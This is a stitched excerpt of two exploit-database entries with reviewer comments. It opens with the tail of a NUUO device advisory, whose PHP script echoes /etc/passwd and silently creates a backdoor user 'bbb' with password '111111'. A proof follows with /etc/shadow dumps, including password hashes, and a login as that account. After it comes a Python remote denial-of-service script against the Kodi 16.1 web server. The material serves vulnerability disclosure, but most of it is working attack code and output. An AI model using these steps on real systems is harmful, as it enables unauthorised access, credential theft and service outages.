$tmp['groupname'] = $maGroup[$key]->strGroupname;
$tmp['members'] = array();
echo "Group (" . $key . ") === " . $maGroup[$key]->strGroupname;
echo "<br><br>";
ma_getgroupmember($maGroup[$key]->strGroupname);
foreach ($maGroupmember as $mKey => $mValue)
{
echo " User ($mKey) ===> $mValue ";
echo "<br>";
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
}
//foreach($value as $userkey => $uservalue)
//{
// echo " User ($userkey) ===> $uservalue ";
// echo "<br>";
//}
echo "<br>";
echo implode(",", $tmp['members']);
echo "<br>";
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
}
echo "<h1> Other </h1>";
$tmp = array();
$tmp['groupname'] = 'admin';
ma_getgroupmember($tmp['groupname']);
//ma_getgroupmember('');
$tmp['members'] = array();
foreach ($maGroupmember as $mKey => $mValue)
{
array_push($tmp['members'], $maGroupmember[$mKey]->strUsername);
echo $maGroupmember[$mKey]->strUsername . "<br>";
}
$tmp['membersStr'] = implode(",", $tmp['members']);
array_push($result['groups'], $tmp);
echo "<h1> USER </h1>";
foreach ( $maUser as $key => $value)
{
$tmp = array();
$tmp['username'] = $maUser[$key]->strUsername;
$tmp['groups'] = array();
foreach ($result['groups'] as $gKey => $gValue)
{
if (in_array($tmp['username'], $gValue['members']))
array_push($tmp['groups'], $gValue['groupname']);
}
$tmp['groupsStr'] = implode(",", $tmp['groups']);
echo $tmp['username'] . "<br>";
echo $tmp['groupsStr'] . "<br>";
array_push($result['users'], $tmp);
}
*/
echo "<h1> Read Passwd </h1>";
$passclass = new ReadPasswd('/etc/passwd');
echo $passclass->getAllHTML();
echo "<h1> add user </h1>";
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H; passwd bbb 111111");
//$output = system("adduser bbb -G poweruser -s /sbin/nologin -D -H");
$output = system("adduser bbb -G poweruser -D ");
/*
$f = popen ("/usr/bin/passwd bbb","r");
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($f, 1024);
$out = fwrite($f,"111111\n");
echo $read . " read 222 ,,, $out <br>";
pclose($f);
//echo $output . " kkk <br>";
*/
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w") // stdout is a pipe that the child will write to
);
$process = proc_open('/usr/bin/passwd bbb', $descriptorspec, $pipes);
if (is_resource($process))
{
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
$read = fread($pipes[1], 1024);
$out = fwrite($pipes[0],"111111\n");
echo $read . " read 111 ,,, $out <br>";
fclose($pipes[0]);
fclose($pipes[1]);
}
proc_close($process);
//$handle = popen("/bin/ls", "r");
//$read = fread($handle, 1024);
//echo $read;
//pclose($handle);
?>
==================================================================
Tested on: GNU/Linux 3.0.8 (armv7l)
GNU/Linux 2.6.31.8 (armv5tel)
lighttpd/1.4.28
PHP/5.5.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5354
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5354.php
14.01.2016
--
#1
Read of /etc/shadow file before backdoor was enabled:
------------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
#2
Issuing GET request to the script:
-----------------------------------
GET http://10.0.0.17/strong_user.php HTTP/1.1
#3
Read of /etc/shadow file after backdoor was enabled:
-----------------------------------------------------
root@nuuo:~# cat /etc/shadow
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
#4
The backdoor account is able to read the /etc/shadow file:
-----------------------------------------------------------
login as: bbb
bbb@10.0.0.17's password:
-sh-3.2$ id
Using fallback suid method
uid=1004(bbb) gid=1000(poweruser) groups=1000(poweruser)
-sh-3.2$ cat /etc/shadow
Using fallback suid method
#root:$1$1b0pmacH$sP7VdEAv01TvOk1JSl2L6/:14495:0:99999:7:::
root:$1$vd3TecoS$VyBh4/IsumZkqFU.1wfrV.:14461:0:99999:7:::
bin:*:14495:0:99999:7:::
daemon:*:14495:0:99999:7:::
adm:*:14495:0:99999:7:::
lp:*:14495:0:99999:7:::
sync:*:14495:0:99999:7:::
shutdown:*:14495:0:99999:7:::
halt:*:14495:0:99999:7:::
mail:*:14495:0:99999:7:::
uucp:*:14495:0:99999:7:::
operator:*:14495:0:99999:7:::
games:*:14495:0:99999:7:::
gopher:*:14495:0:99999:7:::
ftp:*:14495:0:99999:7:::
nobody:*:14495:0:99999:7:::
vcsa:!!:14564::::::
sshd:!!:14564::::::
guest::14564:0:99999:7:::
bbb:$1$gYfUNAQN$.sn8WpIO5gNoOQeZzSyBI/:16915:0:99999:7:::
-sh-3.2$
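Review bot: the two commented-out variants above `$output = system("adduser bbb -G poweruser -D ");` show that `-s /sbin/nologin -H` were tried and dropped, which is exactly why step #4 works: the live call creates a user with a login shell and a home directory, then feeds `111111` to passwd through `proc_open`. That chain belongs in Desc. Two further findings are visible in the script and proof but not named: the page echoes /etc/passwd to any unauthenticated caller through `getAllHTML()` on `/etc/passwd`, and in #4 uid 1004 reads /etc/shadow (`Using fallback suid method`), so shadow is readable to non-root users independently of this backdoor; each should get its own advisory line. For responders the indicators are a GET for /strong_user.php in the lighttpd access log and the new `bbb:$1$...:16915:` shadow entry, uid 1004 in group `poweruser`.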

platforms/windows/dos/40208.py Executable file

@ -0,0 +1,54 @@
# Exploit Title: Kodi 16.1 Web Server Remote DoS
# Date: 06/08/2016
# Exploit Author: Guillaume Kaddouch
# Twitter: @gkweb76
# Blog: https://networkfilter.blogspot.com
# GitHub: https://github.com/gkweb76/exploits
# Vendor Homepage: https://kodi.tv/
# Software Link: http://mirrors.kodi.tv/releases/win32/kodi-16.1-Jarvis.exe
# Version: 16.1
# Tested on: Windows 7 Family x64 (FR)
# Category: DoS
"""
Disclosure Timeline:
--------------------
2016-08-02: Vulnerability discovered
2016-08-04: Vendor contacted
2016-08-04: Developper answered. Kodi v16 is End Of Life and will not be fixed.
2016-08-06: Exploit published.
Description :
-------------
A remote Denial Of Service exists in Kodi 16.1 (Jarvis) embedded web server when sending a specially crafted GET request.
The web server is disabled by default.
Instructions:
-------------
- Starts Kodi, and enable the web server in System, Services, Web server.
- Run this exploit locally or from your remote attacking machine.
"""
import socket
host = "192.168.135.129"
port = 8080
junk = '../' * 10
buffer = "GET " + junk + " HTTP/1.1\r\n"
buffer += "\r\n\r\n"
try:
print "[*] Connecting to %s:%d" % (host, port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "[*] Sending buffer... (%d bytes)" % len(buffer)
s.send(buffer)
s.close()
print "[*] Done."
except:
print "[-] Error connecting"
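Review bot: the description does not say what the crash is (whether Kodi itself exits or only the web server stops answering, and which component fails on the repeated `../`), and without that an operator cannot tell a process crash from a hang; add the observed effect. In the script, `s.send` may write fewer bytes than `len(buffer)` and the bare `except:` also swallows `KeyboardInterrupt`, so use `sendall` and `except socket.error`; a `settimeout` would stop it from blocking on connect. The header `Date: 06/08/2016` should match the index entry for 40208. Since the vendor's answer is that v16 is End Of Life, the mitigation line to add is simply: keep the web server disabled (the default, as the text notes) or restrict port 8080 to trusted hosts.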